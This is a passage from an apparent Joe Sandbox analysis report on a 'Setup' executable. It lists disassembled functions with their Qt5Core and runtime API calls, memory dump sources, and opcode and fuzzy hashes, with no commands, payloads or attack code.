                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Url@@V0@@$?setDateMode@1@@ParsingTime@@$BasicFragment@Password@Timer@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 269014786-0
                                                                                                                                                              • Opcode ID: 3112001fc9154d0536489b93d6263b1877e249f9f2bb654ef4c78ecbe98f8242
                                                                                                                                                              • Instruction ID: 06a1ba69469416a55779894a180d002924de895d419fc34d9dc2852424e9b949
                                                                                                                                                              • Opcode Fuzzy Hash: 3112001fc9154d0536489b93d6263b1877e249f9f2bb654ef4c78ecbe98f8242
                                                                                                                                                              • Instruction Fuzzy Hash: CD012D61A2EA4291DB41DB31E4581B96361FF89BE4B444032ED1E4A669EF2CD549CF00
                                                                                                                                                              Function 00007FFBA19F3930 Relevance: 9.1, APIs: 6, Instructions: 147COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@?dispose@Data@1@@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3322671543-0
                                                                                                                                                              • Opcode ID: 8df992e923d5276c4f93b6f6de70d4bd9cff2615a7425559f57ad2ca84a91242
                                                                                                                                                              • Instruction ID: c18b53f66b1926104cd77842812d6db8f2ba4de55706f5ac5984d35d602a18af
                                                                                                                                                              • Opcode Fuzzy Hash: 8df992e923d5276c4f93b6f6de70d4bd9cff2615a7425559f57ad2ca84a91242
                                                                                                                                                              • Instruction Fuzzy Hash: 1C51B572B0AB4692EF968F66E450179B325FB80BA4F444132DE5D07794EF7CE54ACB00
                                                                                                                                                              Function 00007FFBA1991350 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$?dispose@Data@1@@Data@@List
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2030119362-0
                                                                                                                                                              • Opcode ID: b8dfc25b08bbf89d1e7bef0675028bff08bad7bac303d20bd38451c710fed987
                                                                                                                                                              • Instruction ID: 59be7359c70a416a67dff7fcc5de3e99395581656ea833023c37e34fe600ac10
                                                                                                                                                              • Opcode Fuzzy Hash: b8dfc25b08bbf89d1e7bef0675028bff08bad7bac303d20bd38451c710fed987
                                                                                                                                                              • Instruction Fuzzy Hash: F231B0B2B0AA4286E7A1DF35D94017D2361FB44FA8F594532CE4D47668DF3CE986CB00
                                                                                                                                                              Function 00007FFBA1A24A80 Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA1A21C5F,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A24B0E
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA1A21C5F,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A24B2C
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA1A21C5F,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A24B55
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA1A21C5F,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A24B60
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA1A21C5F,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A24B6B
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00007FFBA1A21C5F,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A24B76
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$String@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 554220883-0
                                                                                                                                                              • Opcode ID: e1bc3941e8e4c200ab6832a70fa6da3ce8d5e948e09c7c310e6e126ea9a91e7e
                                                                                                                                                              • Instruction ID: f36e85c22423ba620899a6236020376be6ed18ffa2c9fc8a179e530f5bdf6f69
                                                                                                                                                              • Opcode Fuzzy Hash: e1bc3941e8e4c200ab6832a70fa6da3ce8d5e948e09c7c310e6e126ea9a91e7e
                                                                                                                                                              • Instruction Fuzzy Hash: 49316172A0EA4681EF81DB75E5800AC6761FB84B94F444033EE5D47666EF3CD449CF40
                                                                                                                                                              Function 00007FFBA1988C10 Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                                • Part of subcall function 00007FFBA1987E40: ??0QIODevicePrivate@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FFBA19CE780), ref: 00007FFBA1987E4D
                                                                                                                                                                • Part of subcall function 00007FFBA1987E40: ??0QMutex@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,00007FFBA19CE780), ref: 00007FFBA1987EB6
                                                                                                                                                                • Part of subcall function 00007FFBA1987E40: ??0QVariant@@QEAA@_N@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19CE780), ref: 00007FFBA1987F13
                                                                                                                                                                • Part of subcall function 00007FFBA1987E40: ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA1987F41
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE ref: 00007FFBA1988C9D
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1988CEC
                                                                                                                                                              • ??0QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA1988D28
                                                                                                                                                                • Part of subcall function 00007FFBA1984AD0: ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1984B55
                                                                                                                                                              • ?toBool@QVariant@@QEBA_NXZ.QT5CORE ref: 00007FFBA1988D49
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA1988D59
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA1988D64
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$Mutex@@$Bool@DevicePrivate@@String@@V0@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3068780738-0
                                                                                                                                                              • Opcode ID: 59a5179f1d11884cde40d662bde4b05fb382d703480cdb0dc2106f2b9ab2d82e
                                                                                                                                                              • Instruction ID: 7eae8143e8471bde75df24b21d1077bacd728640223180fa0c59abfef985a94d
                                                                                                                                                              • Opcode Fuzzy Hash: 59a5179f1d11884cde40d662bde4b05fb382d703480cdb0dc2106f2b9ab2d82e
                                                                                                                                                              • Instruction Fuzzy Hash: 68410972609B82A2D78D9F35EA842D9B364FB58764F840235DBBD43395EF38A175CB00
                                                                                                                                                              Function 00007FFBA1974550 Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteString@@$malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2645771327-0
                                                                                                                                                              • Opcode ID: 2078f208b5ee45eb34288961ffa1ba867a4a267f7308574dff1d1e2ea3f9cd65
                                                                                                                                                              • Instruction ID: 749a03688226c82a602249d6ab4dac3f11e7cd0a36331ac829b9861a5f42c4f2
                                                                                                                                                              • Opcode Fuzzy Hash: 2078f208b5ee45eb34288961ffa1ba867a4a267f7308574dff1d1e2ea3f9cd65
                                                                                                                                                              • Instruction Fuzzy Hash: 79314D7661AA8182DB81DF21E4541A97361FB98B80F849033EE9E07B59EF3CD458CF40
                                                                                                                                                              Function 00007FFBA1A3CD30 Relevance: 9.1, APIs: 6, Instructions: 72timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3CD42
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3CD5D
                                                                                                                                                                • Part of subcall function 00007FFBA1A36930: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD8B,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36948
                                                                                                                                                                • Part of subcall function 00007FFBA1A36930: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD8B,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3696D
                                                                                                                                                                • Part of subcall function 00007FFBA1A36930: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD8B,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36984
                                                                                                                                                                • Part of subcall function 00007FFBA1A368C0: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD96,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A368D8
                                                                                                                                                                • Part of subcall function 00007FFBA1A368C0: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD96,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A368FD
                                                                                                                                                                • Part of subcall function 00007FFBA1A368C0: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CD96,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36914
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ??0QDate@@QEAA@HHH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA1A3CDA6), ref: 00007FFBA1A36E98
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ??0QTime@@QEAA@HHHH@Z.QT5CORE ref: 00007FFBA1A36EBE
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ??0QDateTime@@QEAA@AEBVQDate@@AEBVQTime@@W4TimeSpec@Qt@@@Z.QT5CORE ref: 00007FFBA1A36ED6
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ?addSecs@QDateTime@@QEBA?AV1@_J@Z.QT5CORE ref: 00007FFBA1A36EE7
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1A36EF4
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1A36EFE
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ??0QDateTime@@QEAA@$$QEAV0@@Z.QT5CORE ref: 00007FFBA1A36F0B
                                                                                                                                                                • Part of subcall function 00007FFBA1A36CB0: ??1QDateTime@@QEAA@XZ.QT5CORE ref: 00007FFBA1A36F15
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3CDB2
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3CDBD
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3CDDC
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3CDE7
                                                                                                                                                                • Part of subcall function 00007FFBA1A36460: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A36478
                                                                                                                                                                • Part of subcall function 00007FFBA1A36460: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A3649D
                                                                                                                                                                • Part of subcall function 00007FFBA1A36460: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A3CDFD,?,?,00000000,?,00007FFBA1A3D1C6), ref: 00007FFBA1A364B4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time@@$Date$Logger@@Message$V0@@$?warning@Category@@Enabled@H00@LoggingV0@$$Warning$Date@@$?addA@$$Array@@ByteQt@@@Secs@Spec@String@@TimeV1@_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3088503744-0
                                                                                                                                                              • Opcode ID: 6dab6fa66d0e8df75777198526b142582ef3becd6902c1e4de11fe8282f9f39f
                                                                                                                                                              • Instruction ID: 1f98b89ee6dfaa9647a33dddb1bb64427dd317b5821546f7ee49644d8029fc44
                                                                                                                                                              • Opcode Fuzzy Hash: 6dab6fa66d0e8df75777198526b142582ef3becd6902c1e4de11fe8282f9f39f
                                                                                                                                                              • Instruction Fuzzy Hash: 412171A6A0E64281EB42EB25E8501BAA361FF85BD0F840033EE9D4775AEF2CD545CF10
                                                                                                                                                              Function 00007FFBA1971570 Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteString@@$?data@Char@@$?cend@?resize@?size@Initialization@Qt@@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3254343722-0
                                                                                                                                                              • Opcode ID: 6fa3ff44a7b80bff04de55143e7de199284f0b7184df7522e2f0d56c82003eaf
                                                                                                                                                              • Instruction ID: 690b4a3ba35f05664c67a46ae311920ac0a3f44416bf272426a015065f9e9862
                                                                                                                                                              • Opcode Fuzzy Hash: 6fa3ff44a7b80bff04de55143e7de199284f0b7184df7522e2f0d56c82003eaf
                                                                                                                                                              • Instruction Fuzzy Hash: DC21B2A670A69186DB458F32E554179BBA1FF89FD4B48C031DE6E07714EE3DD44ACB00
                                                                                                                                                              Function 00007FFBA1A215E0 Relevance: 9.1, APIs: 6, Instructions: 70memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,00007FFBA1A27F6A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A2163F
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,?,?,00007FFBA1A27F6A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A21655
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA1A27F6A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A21674
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA1A27F6A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A21683
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,00007FFBA1A27F6A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A21694
                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,00007FFBA1A27F6A,?,?,00000000,00007FFBA1A2A242,?,?,?,00007FFBA1A2C553,?,?,00000000,00007FFBA1A459A0), ref: 00007FFBA1A216AA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?data@$?allocate@AllocationData@@@@@Flags@Option@U1@_$memmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1619863973-0
                                                                                                                                                              • Opcode ID: f014c3316b9fb98ecc44e87c2420ac0b39badbde606f81a2ffc3a509255359cf
                                                                                                                                                              • Instruction ID: a3c31f4a297b08e17bca8f8c79f96163e624788c5d46bee923502c0d3b890083
                                                                                                                                                              • Opcode Fuzzy Hash: f014c3316b9fb98ecc44e87c2420ac0b39badbde606f81a2ffc3a509255359cf
                                                                                                                                                              • Instruction Fuzzy Hash: 9A31A272606A4186DBA1CF26E48016D77A0EB84FA4B28C132DE6D877A0EF3DD445CF00
                                                                                                                                                              Function 00007FFBA19735E0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@ListString@@$FindObject@@$?begin@?dispose@?end@?qt_qChildChildren_helper@@Data@1@@Flags@List@MetaOption@Qt@@@@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2432269031-0
                                                                                                                                                              • Opcode ID: 1b5d0e9cff818f5acebfaa74b06266a75ca115e808ba74cb5e7480eae2dea33d
                                                                                                                                                              • Instruction ID: fd6a2c15dfcea7036a2294f8d5e2ada89cd2ba5405a70cceca0858479d638c8e
                                                                                                                                                              • Opcode Fuzzy Hash: 1b5d0e9cff818f5acebfaa74b06266a75ca115e808ba74cb5e7480eae2dea33d
                                                                                                                                                              • Instruction Fuzzy Hash: C1218F7660AA4682EF828F65E450178B360FF84BA8F544132DE5E077A4EF7CD44ACF00
                                                                                                                                                              Function 00007FFBA1A3DA50 Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Base@@$Node$?set$Parent@U1@@$?color@?createArray@@ByteColor@Color@1@Color@1@@DataNode@U2@_V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 485551508-0
                                                                                                                                                              • Opcode ID: 703937539ab84d4ae22bbadb6ac05fc854437c87643de35da0c6cf114afc309e
                                                                                                                                                              • Instruction ID: 30179eba1908ca3fb3ae62787d9e043cb2e34a1d96b223c10e2dca2c24818634
                                                                                                                                                              • Opcode Fuzzy Hash: 703937539ab84d4ae22bbadb6ac05fc854437c87643de35da0c6cf114afc309e
                                                                                                                                                              • Instruction Fuzzy Hash: 78214CB6B09651C2EB459F22E5143296361FB88F94F488535CE6E47B18EF3CD455CB40
                                                                                                                                                              Function 00007FFBA1986950 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
